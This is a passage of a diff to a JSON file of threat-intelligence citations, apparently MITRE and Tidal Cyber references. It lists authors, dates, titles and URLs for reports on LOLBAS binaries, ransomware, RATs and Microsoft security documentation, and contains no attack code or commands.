"https://docs.microsoft.com/sysinternals/downloads/reghide" + ], + "source": "MITRE", + "title": "Reghide" + }, + "related": [], + "uuid": "42503ec7-f5da-4116-a3b3-a1b18a66eed3", + "value": "Microsoft Reghide NOV 2006" + }, + { + "description": "LOLBAS. (2020, July 3). Regini.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-07-03T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regini/" + ], + "source": "Tidal Cyber", + "title": "Regini.exe" + }, + "related": [], + "uuid": "db2573d2-6ecd-4c5a-b038-2f799f9723ae", + "value": "Regini.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Register-cimprovider.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/" + ], + "source": "Tidal Cyber", + "title": "Register-cimprovider.exe" + }, + "related": [], + "uuid": "d445d016-c4f1-45c8-929d-913867275417", + "value": "Register-cimprovider.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2018, May 31). Registry. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + "source": "MITRE", + "title": "Registry" + }, + "related": [], + "uuid": "08dc94ff-a289-45bd-93c2-1183fd507493", + "value": "Microsoft Registry" + }, + { + "description": "Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2014-08-28T00:00:00Z", + "refs": [ + "http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/" + ], + "source": "MITRE", + "title": "Registry Analysis with CrowdResponse" + }, + "related": [], + "uuid": "136325ee-0712-49dd-b3ab-a6f2bfb218b0", + "value": "Tilbury 2014" + }, + { + "description": "Microsoft. (2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020.", + "meta": { + "date_accessed": "2020-06-24T00:00:00Z", + "date_published": "2013-02-04T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)" + ], + "source": "MITRE", + "title": "Registry-Free Profiler Startup and Attach" + }, + "related": [], + "uuid": "4e85ef68-dfb7-4db3-ac76-92f4b78cb1cd", + "value": "Microsoft COR_PROFILER Feb 2013" + }, + { + "description": "Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018.", + "meta": { + "date_accessed": "2018-01-31T00:00:00Z", + "date_published": "2016-08-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)" + ], + "source": "MITRE", + "title": "Registry (Global Object Access Auditing)" + }, + "related": [], + "uuid": "f58ac1e4-c470-4aac-a077-7f358e25b0fa", + "value": "Microsoft Registry Auditing Aug 2016" + }, + { + "description": "Microsoft. (n.d.). Registry Key Security and Access Rights. Retrieved March 16, 2017.", + "meta": { + "date_accessed": "2017-03-16T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx" + ], + "source": "MITRE", + "title": "Registry Key Security and Access Rights" + }, + "related": [], + "uuid": "c5627d86-1b59-4c2a-aac0-88f1b4dc6974", + "value": "MSDN Registry Key Security" + }, + { + "description": "Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017.", + "meta": { + "date_accessed": "2017-03-16T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN" + ], + "source": "MITRE", + "title": "Registry Key Security and Access Rights" + }, + "related": [], + "uuid": "f8f12cbb-029c-48b1-87ce-624a7f98c8ab", + "value": "Registry Key Security" + }, + { + "description": "Microsoft. (2021, December 14). Registry Trees for Devices and Drivers. Retrieved March 28, 2023.", + "meta": { + "date_accessed": "2023-03-28T00:00:00Z", + "date_published": "2021-12-14T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/windows-hardware/drivers/install/overview-of-registry-trees-and-keys" + ], + "source": "MITRE", + "title": "Registry Trees for Devices and Drivers" + }, + "related": [], + "uuid": "4bde767e-d4a7-56c5-9aa3-b3f3cc2e3e70", + "value": "Microsoft Registry Drivers" + }, + { + "description": "Microsoft. (n.d.). Registry Values for System-Wide Security. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx" + ], + "source": "MITRE", + "title": "Registry Values for System-Wide Security" + }, + "related": [], + "uuid": "e0836ebc-66fd-46ac-adf6-727b46f2fb38", + "value": "Microsoft System Wide Com Keys" + }, + { + "description": "LOLBAS. (n.d.). Regsvcs.exe. Retrieved July 31, 2019.", + "meta": { + "date_accessed": "2019-07-31T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/" + ], + "source": "MITRE", + "title": "Regsvcs.exe" + }, + "related": [], + "uuid": "3f669f4c-0b94-4b78-ad3e-fd62f7600902", + "value": "LOLBAS Regsvcs" + }, + { + "description": "Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.", + "meta": { + "date_accessed": "2016-07-01T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/04za0hca.aspx" + ], + "source": "MITRE", + "title": "Regsvcs.exe (.NET Services Installation Tool)" + }, + "related": [], + "uuid": "4f3651df-159e-4006-8cb6-de0d0712a194", + "value": "MSDN Regsvcs" + }, + { + "description": "LOLBAS. (n.d.). Regsvr32.exe. Retrieved July 31, 2019.", + "meta": { + "date_accessed": "2019-07-31T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/" + ], + "source": "MITRE", + "title": "Regsvr32.exe" + }, + "related": [], + "uuid": "8e32abef-534e-475a-baad-946b6ec681c1", + "value": "LOLBAS Regsvr32" + }, + { + "description": "Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018.", + "meta": { + "date_accessed": "2018-11-06T00:00:00Z", + "date_published": "2017-02-14T00:00:00Z", + "refs": [ + "https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html" + ], + "source": "MITRE", + "title": "REMCOS: A New RAT In The Wild" + }, + "related": [], + "uuid": "c4d5d6e7-47c0-457a-b396-53d34f87e444", + "value": "Fortinet Remcos Feb 2017" + }, + { + "description": "Mandiant. (2022, August). Remediation and Hardening Strategies for Microsoft 365 to Defend Against APT29. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2022-08-01T00:00:00Z", + "refs": [ + "https://www.mandiant.com/sites/default/files/2022-08/remediation-hardening-strategies-for-m365-defend-against-apt29-white-paper.pdf" + ], + "source": "MITRE", + "title": "Remediation and Hardening Strategies for Microsoft 365 to Defend Against APT29" + }, + "related": [], + "uuid": "4054604b-7c0f-5012-b40c-2b117f6b54c2", + "value": "Mandiant Remediation and Hardening Strategies for Microsoft 365" + }, + { + "description": "Mandiant. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved January 22, 2021.", + "meta": { + "date_accessed": "2021-01-22T00:00:00Z", + "date_published": "2021-01-19T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/collateral/en/wp-m-unc2452.pdf" + ], + "source": "MITRE", + "title": "Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452" + }, + "related": [], + "uuid": "ed031297-d0f5-44a7-9723-ba692e923a6e", + "value": "Mandiant Defend UNC2452 White Paper" + }, + { + "description": "Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021.", + "meta": { + "date_accessed": "2021-09-25T00:00:00Z", + "date_published": "2021-01-19T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html" + ], + "source": "MITRE", + "title": "Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452" + }, + "related": [], + "uuid": "7aa5c294-df8e-4994-9b9e-69444d75ef37", + "value": "Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452" + }, + { + "description": "Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.", + "meta": { + "date_accessed": "2016-06-01T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx" + ], + "source": "MITRE", + "title": "Remote Desktop Services" + }, + "related": [], + "uuid": "b8fc1bdf-f602-4a9b-a51c-fa49e70f24cd", + "value": "TechNet Remote Desktop Services" + }, + { + "description": "LOLBAS. (2021, June 1). Remote.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-06-01T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/" + ], + "source": "Tidal Cyber", + "title": "Remote.exe" + }, + "related": [], + "uuid": "9a298f83-80b8-45a3-9f63-6119be6621b4", + "value": "Remote.exe - LOLBAS Project" + }, + { + "description": "Margosis, A.. (2018, December 10). Remote Use of Local Accounts: LAPS Changes Everything. Retrieved March 13, 2020.", + "meta": { + "date_accessed": "2020-03-13T00:00:00Z", + "date_published": "2018-12-10T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/secguide/2018/12/10/remote-use-of-local-accounts-laps-changes-everything/" + ], + "source": "MITRE", + "title": "Remote Use of Local Accounts: LAPS Changes Everything" + }, + "related": [], + "uuid": "2239d595-4b80-4828-9d06-f8de221f9534", + "value": "Microsoft Remote Use of Local" + }, + { + "description": "Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule Task - Registry. Retrieved June 1, 2022.", + "meta": { + "date_accessed": "2022-06-01T00:00:00Z", + "date_published": "2022-04-15T00:00:00Z", + "refs": [ + "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml" + ], + "source": "MITRE", + "title": "Removal Of SD Value to Hide Schedule Task - Registry" + }, + "related": [], + "uuid": "27812e3f-9177-42ad-8681-91c65aba4743", + "value": "SigmaHQ" + }, + { + "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.", + "meta": { + "date_accessed": "2022-04-07T00:00:00Z", + "refs": [ + "https://ptylu.github.io/content/report/report.html?report=25" + ], + "source": "MITRE", + "title": "REP-25: Disable Windows Event Logging" + }, + "related": [], + "uuid": "408c0c8c-5d8e-5ebe-bd31-81b405c615d8", + "value": "disable_win_evt_logging" + }, + { + "description": "Brower, N., Lich, B. (2017, April 19). Replace a process level token. Retrieved December 19, 2017.", + "meta": { + "date_accessed": "2017-12-19T00:00:00Z", + "date_published": "2017-04-19T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/device-security/security-policy-settings/replace-a-process-level-token" + ], + "source": "MITRE", + "title": "Replace a process level token" + }, + "related": [], + "uuid": "75130a36-e859-438b-9536-410c2831b2de", + "value": "Microsoft Replace Process Token" + }, + { + "description": "LOLBAS. (2018, May 25). Replace.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Replace/" + ], + "source": "Tidal Cyber", + "title": "Replace.exe" + }, + "related": [], + "uuid": "82a473e9-208c-4c47-bf38-92aee43238dd", + "value": "Replace.exe - LOLBAS Project" + }, + { + "description": "Bugcrowd. (n.d.). Replay Attack. Retrieved September 27, 2023.", + "meta": { + "date_accessed": "2023-09-27T00:00:00Z", + "refs": [ + "https://www.bugcrowd.com/glossary/replay-attack/" + ], + "source": "MITRE", + "title": "Replay Attack" + }, + "related": [], + "uuid": "ed31056c-23cb-5cb0-9b70-f363c54b27f7", + "value": "Bugcrowd Replay Attack" + }, + { + "description": "Apple. (n.d.). Reply to, forward, or redirect emails in Mail on Mac. Retrieved June 22, 2021.", + "meta": { + "date_accessed": "2021-06-22T00:00:00Z", + "refs": [ + "https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac" + ], + "source": "MITRE", + "title": "Reply to, forward, or redirect emails in Mail on Mac" + }, + "related": [], + "uuid": "0ff40575-cd2d-4a70-a07b-fff85f520062", + "value": "Mac Forwarding Rules" + }, + { + "description": "Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2018-03-08T00:00:00Z", + "refs": [ + "https://github.com/f0rb1dd3n/Reptile" + ], + "source": "MITRE", + "title": "Reptile - LMK Linux rootkit" + }, + "related": [], + "uuid": "6e8cc88a-fb3f-4464-9380-868f597def6e", + "value": "GitHub Reptile" + }, + { + "description": "AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html" + ], + "source": "MITRE", + "title": "Requesting temporary security credentials" + }, + "related": [], + "uuid": "c6f29134-5af2-42e1-af4f-fbb9eae03432", + "value": "AWS Temporary Security Credentials" + }, + { + "description": "Sean Gallagher. (2017, April 21). Researchers claim China trying to hack South Korea missile defense efforts. Retrieved October 17, 2021.", + "meta": { + "date_accessed": "2021-10-17T00:00:00Z", + "date_published": "2017-04-21T00:00:00Z", + "refs": [ + "https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Researchers claim China trying to hack South Korea missile defense efforts" + }, + "related": [], + "uuid": "c9c647b6-f4fb-44d6-9376-23c1ae9520b4", + "value": "ARS Technica China Hack SK April 2017" + }, + { + "description": "Zetter, K. (2019, October 3). Researchers Say They Uncovered Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved October 15, 2020.", + "meta": { + "date_accessed": "2020-10-15T00:00:00Z", + "date_published": "2019-10-03T00:00:00Z", + "refs": [ + "https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec" + ], + "source": "MITRE", + "title": "Researchers Say They Uncovered Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC" + }, + "related": [], + "uuid": "5f28adee-1313-48ec-895c-27341bd1071f", + "value": "Wired SandCat Oct 2019" + }, + { + "description": "Moe, O. (2017, August 15). Research on CMSTP.exe. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2017-08-15T00:00:00Z", + "refs": [ + "https://msitpros.com/?p=3960" + ], + "source": "MITRE", + "title": "Research on CMSTP.exe" + }, + "related": [], + "uuid": "8dbbf13b-e73c-43c2-a053-7b07fdf25c85", + "value": "MSitPros CMSTP Aug 2017" + }, + { + "description": "Phil Stokes. (2020, November 5). Resourceful macOS Malware Hides in Named Fork. Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "date_published": "2020-11-05T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/" + ], + "source": "MITRE", + "title": "Resourceful macOS Malware Hides in Named Fork" + }, + "related": [], + "uuid": "0008dfd8-25a1-4e6a-9154-da7bcbb7daa7", + "value": "sentinellabs resource named fork 2020" + }, + { + "description": "Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.", + "meta": { + "date_accessed": "2017-11-17T00:00:00Z", + "date_published": "2016-08-25T00:00:00Z", + "refs": [ + "https://github.com/SpiderLabs/Responder" + ], + "source": "MITRE", + "title": "Responder" + }, + "related": [], + "uuid": "3ef681a9-4ab0-420b-9d1a-b8152c50b3ca", + "value": "GitHub Responder" + }, + { + "description": "Sadowski, J; Hall, R. (2022, March 4). Responses to Russia's Invasion of Ukraine Likely to Spur Retaliation. Retrieved June 9, 2022.", + "meta": { + "date_accessed": "2022-06-09T00:00:00Z", + "date_published": "2022-03-04T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation" + ], + "source": "MITRE", + "title": "Responses to Russia's Invasion of Ukraine Likely to Spur Retaliation" + }, + "related": [], + "uuid": "63d89139-9dd4-4ed6-bf6e-8cd872c5d034", + "value": "Mandiant UNC2589 March 2022" + }, + { + "description": "Falcon Complete Team. (2021, May 11). Response When Minutes Matter: Rising Up Against Ransomware. Retrieved October 8, 2021.", + "meta": { + "date_accessed": "2021-10-08T00:00:00Z", + "date_published": "2021-05-11T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/" + ], + "source": "MITRE", + "title": "Response When Minutes Matter: Rising Up Against Ransomware" + }, + "related": [], + "uuid": "a4cb3caf-e7ef-4662-93c6-63a0c3352a32", + "value": "CrowdStrike BGH Ransomware 2021" + }, + { + "description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019.", + "meta": { + "date_accessed": "2019-10-08T00:00:00Z", + "date_published": "2019-10-07T00:00:00Z", + "refs": [ + "https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots" + ], + "source": "MITRE", + "title": "Restoring and deleting persistent disk snapshots" + }, + "related": [], + "uuid": "ffa46676-518e-4fef-965d-e91efae95dfc", + "value": "Google - Restore Cloud Snapshot" + }, + { + "description": "Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.", + "meta": { + "date_accessed": "2020-03-03T00:00:00Z", + "refs": [ + "https://cloud.google.com/compute/docs/reference/rest/v1/instances" + ], + "source": "MITRE", + "title": "Rest Resource: instance" + }, + "related": [], + "uuid": "9733447c-072f-4da8-9cc7-0a0ce6a3b820", + "value": "Google Instances Resource" + }, + { + "description": "Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.", + "meta": { + "date_accessed": "2020-08-12T00:00:00Z", + "date_published": "2019-07-24T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector" + ], + "source": "MITRE, Tidal Cyber", + "title": "Resurgent Iron Liberty Targeting Energy Sector" + }, + "related": [], + "uuid": "c666200d-5392-43f2-9ad0-1268d7b2e86f", + "value": "Secureworks IRON LIBERTY July 2019" + }, + { + "description": "Levene, B., Falcone, R., Grunzweig, J., Lee, B., Olson, R. (2015, August 20). Retefe Banking Trojan Targets Sweden, Switzerland and Japan. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "date_published": "2015-08-20T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/" + ], + "source": "MITRE", + "title": "Retefe Banking Trojan Targets Sweden, Switzerland and Japan" + }, + "related": [], + "uuid": "52f841b0-10a8-4f48-8265-5b336489ff80", + "value": "Palo Alto Retefe" + }, + { + "description": "AWS. (n.d.). Retrieve secrets from AWS Secrets Manager. Retrieved September 25, 2023.", + "meta": { + "date_accessed": "2023-09-25T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/secretsmanager/latest/userguide/retrieving-secrets.html" + ], + "source": "MITRE", + "title": "Retrieve secrets from AWS Secrets Manager" + }, + "related": [], + "uuid": "ec87e183-3018-5cac-9fab-711003be54f7", + "value": "AWS Secrets Manager" + }, + { + "description": "Grafnetter, M. (2015, October 26). Retrieving DPAPI Backup Keys from Active Directory. Retrieved December 19, 2017.", + "meta": { + "date_accessed": "2017-12-19T00:00:00Z", + "date_published": "2015-10-26T00:00:00Z", + "refs": [ + "https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/" + ], + "source": "MITRE", + "title": "Retrieving DPAPI Backup Keys from Active Directory" + }, + "related": [], + "uuid": "e48dc4ce-e7c5-44e4-b033-7ab4bbdbe1cb", + "value": "Directory Services Internals DPAPI Backup Keys Oct 2015" + }, + { + "description": "Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022.", + "meta": { + "date_accessed": "2022-03-22T00:00:00Z", + "date_published": "2021-01-06T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/" + ], + "source": "MITRE", + "title": "Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat" + }, + "related": [], + "uuid": "62ad7dbc-3ed2-4fa5-a56a-2810ce131167", + "value": "Malwarebytes RokRAT VBA January 2021" + }, + { + "description": "Sharma, R. (2018, August 15). Revamped jRAT Uses New Anti-Parsing Techniques. Retrieved September 21, 2018.", + "meta": { + "date_accessed": "2018-09-21T00:00:00Z", + "date_published": "2018-08-15T00:00:00Z", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques" + ], + "source": "MITRE", + "title": "Revamped jRAT Uses New Anti-Parsing Techniques" + }, + "related": [], + "uuid": "8aed9534-2ec6-4c9f-b63b-9bb135432cfb", + "value": "jRAT Symantec Aug 2018" + }, + { + "description": "Lorber, N. (2021, May 7). Revealing the Snip3 Crypter, a Highly Evasive RAT Loader. Retrieved September 13, 2023.", + "meta": { + "date_accessed": "2023-09-13T00:00:00Z", + "date_published": "2021-05-07T00:00:00Z", + "refs": [ + "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader" + ], + "source": "MITRE", + "title": "Revealing the Snip3 Crypter, a Highly Evasive RAT Loader" + }, + "related": [], + "uuid": "abe44c50-8347-5c98-8b04-d41afbe59d4c", + "value": "Morphisec Snip3 May 2021" + }, + { + "description": "Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021.", + "meta": { + "date_accessed": "2021-03-31T00:00:00Z", + "date_published": "2016-06-09T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/" + ], + "source": "MITRE", + "title": "Reverse-engineering DUBNIUM" + }, + "related": [], + "uuid": "ae28afad-e2d6-4c3c-a309-ee7c44a3e586", + "value": "Microsoft DUBNIUM June 2016" + }, + { + "description": "Microsoft. (2016, June 20). Reverse-engineering DUBNIUM’s Flash-targeting exploit. Retrieved March 31, 2021.", + "meta": { + "date_accessed": "2021-03-31T00:00:00Z", + "date_published": "2016-06-20T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/" + ], + "source": "MITRE", + "title": "Reverse-engineering DUBNIUM’s Flash-targeting exploit" + }, + "related": [], + "uuid": "999a471e-6373-463b-a77b-d3020b4a8702", + "value": "Microsoft DUBNIUM Flash June 2016" + }, + { + "description": "Microsoft. (2016, July 14). Reverse engineering DUBNIUM – Stage 2 payload analysis . Retrieved March 31, 2021.", + "meta": { + "date_accessed": "2021-03-31T00:00:00Z", + "date_published": "2016-07-14T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/" + ], + "source": "MITRE", + "title": "Reverse engineering DUBNIUM – Stage 2 payload analysis" + }, + "related": [], + "uuid": "e1bd8fb3-e0b4-4659-85a1-d37e1c3d167f", + "value": "Microsoft DUBNIUM July 2016" + }, + { + "description": "Cyber Safety Review Board. (2023, July 24). Review of the Attacks Associated with LAPSUS$ and Related Threat Groups. Retrieved November 16, 2023.", + "meta": { + "date_accessed": "2023-11-16T00:00:00Z", + "date_published": "2023-07-24T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/sites/default/files/2023-08/CSRB_Lapsus%24_508c.pdf" + ], + "source": "Tidal Cyber", + "title": "Review of the Attacks Associated with LAPSUS$ and Related Threat Groups" + }, + "related": [], + "uuid": "f8311977-303c-4d05-a7f4-25b3ae36318b", + "value": "CSRB LAPSUS$ July 24 2023" + }, + { + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.", + "meta": { + "date_accessed": "2020-08-04T00:00:00Z", + "date_published": "2020-03-31T00:00:00Z", + "refs": [ + "https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/" + ], + "source": "MITRE", + "title": "REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation" + }, + "related": [], + "uuid": "b939dc98-e00e-4d47-84a4-3eaaeb5c0abf", + "value": "Intel 471 REvil March 2020" + }, + { + "description": "Abrams, L. (2021, March 19). REvil ransomware has a new ‘Windows Safe Mode’ encryption mode. Retrieved June 23, 2021.", + "meta": { + "date_accessed": "2021-06-23T00:00:00Z", + "date_published": "2021-03-19T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/" + ], + "source": "MITRE", + "title": "REvil ransomware has a new ‘Windows Safe Mode’ encryption mode" + }, + "related": [], + "uuid": "790ef274-aea4-49b7-8b59-1b95185c5f50", + "value": "BleepingComputer REvil 2021" + }, + { + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.", + "meta": { + "date_accessed": "2020-08-04T00:00:00Z", + "date_published": "2019-09-24T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/revil-sodinokibi-ransomware" + ], + "source": "MITRE, Tidal Cyber", + "title": "REvil/Sodinokibi Ransomware" + }, + "related": [], + "uuid": "8f4e2baf-4227-4bbd-bfdb-5598717dcf88", + "value": "Secureworks REvil September 2019" + }, + { + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.", + "meta": { + "date_accessed": "2020-08-04T00:00:00Z", + "date_published": "2019-09-24T00:00:00Z", + "refs": [ + "https://www.secureworks.com/blog/revil-the-gandcrab-connection" + ], + "source": "MITRE", + "title": "REvil: The GandCrab Connection" + }, + "related": [], + "uuid": "46b5d57b-17be-48ff-b723-406f6a55d84a", + "value": "Secureworks GandCrab and REvil September 2019" + }, + { + "description": "Nelson, M. (2018, January 29). Reviving DDE: Using OneNote and Excel for Code Execution. Retrieved February 3, 2018.", + "meta": { + "date_accessed": "2018-02-03T00:00:00Z", + "date_published": "2018-01-29T00:00:00Z", + "refs": [ + "https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee" + ], + "source": "MITRE", + "title": "Reviving DDE: Using OneNote and Excel for Code Execution" + }, + "related": [], + "uuid": "188a0f02-8d1e-4e4e-b2c0-ddf1bf1bdf93", + "value": "Enigma Reviving DDE Jan 2018" + }, + { + "description": "Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February 12, 2018.", + "meta": { + "date_accessed": "2018-02-12T00:00:00Z", + "date_published": "2017-07-27T00:00:00Z", + "refs": [ + "https://github.com/danielbohannon/Revoke-Obfuscation" + ], + "source": "MITRE", + "title": "Revoke-Obfuscation" + }, + "related": [], + "uuid": "3624d75e-be50-4c10-9e8a-28523568ff9f", + "value": "GitHub Revoke-Obfuscation" + }, + { + "description": "Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018.", + "meta": { + "date_accessed": "2018-02-12T00:00:00Z", + "date_published": "2017-07-27T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf" + ], + "source": "MITRE", + "title": "Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science" + }, + "related": [], + "uuid": "e03e9d19-18bb-4d28-8c96-8c1cef89a20b", + "value": "FireEye Revoke-Obfuscation July 2017" + }, + { + "description": "Health Sector Cybersecurity Coordination Center (HC3). (2023, August 4). Rhysida Ransomware. Retrieved August 11, 2023.", + "meta": { + "date_accessed": "2023-08-11T00:00:00Z", + "date_published": "2023-08-04T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.hhs.gov/sites/default/files/rhysida-ransomware-sector-alert-tlpclear.pdf" + ], + "source": "Tidal Cyber", + "title": "Rhysida Ransomware" + }, + "related": [], + "uuid": "3f6e2821-5073-4382-b5dd-08676eaa2240", + "value": "HC3 Analyst Note Rhysida Ransomware August 2023" + }, + { + "description": "Microsoft Threat Intelligence. (2022, May 19). Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved September 27, 2023.", + "meta": { + "date_accessed": "2023-09-27T00:00:00Z", + "date_published": "2022-05-19T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/" + ], + "source": "MITRE", + "title": "Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices" + }, + "related": [], + "uuid": "6425d351-2c88-5af9-970a-4d0d184d0c70", + "value": "Microsoft XorDdos Linux Stealth 2022" + }, + { + "description": 